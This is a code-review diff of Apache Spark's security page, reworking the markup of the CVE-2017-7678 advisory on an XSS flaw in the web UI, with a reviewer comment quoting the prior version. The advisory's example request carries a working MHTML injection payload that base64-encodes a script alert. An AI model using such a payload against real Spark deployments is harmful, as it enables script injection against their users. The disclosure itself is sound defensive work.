site/security.html

```diff
@@ -252,13 +253,15 @@ <h3 id="CVE-2017-7678">CVE-2017-7678 Apache Spark XSS web UI MHTML vulnerability
 
 <p>Example:
 Request:</p>
+
```

Comment:
Before this change, it was:

```diff
-<p>Credit:</p>
-<ul>
-  <li>Aditya Sharad, Semmle</li>
-</ul>
+<p>Credit:
+- Aditya Sharad, Semmle</p>

 <h3 id="CVE-2017-7678">CVE-2017-7678 Apache Spark XSS web UI MHTML vulnerability</h3>

@@ -251,31 +249,31 @@ It is possible for an attacker to take advantage of a user&#8217;s trust in the
 Update to Apache Spark 2.1.2, 2.2.0 or later.</p>

 <p>Example:
-Request:</p>
-<pre><code>GET /app/?appId=Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a--
+Request:
+<code>
+GET /app/?appId=Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a--
 _AppScan%0d%0aContent-Location:foo%0d%0aContent-Transfer-
 Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a
 HTTP/1.1
-</code></pre>
+</code></p>

-<p>Excerpt from response:</p>
-<pre><code>&lt;div class="row-fluid"&gt;No running application with ID Content-Type: multipart/related;
+<p>Excerpt from response:
+```</p>
---
+<div class="row-fluid">No running application with ID Content-Type: multipart/related;
 boundary=_AppScan
```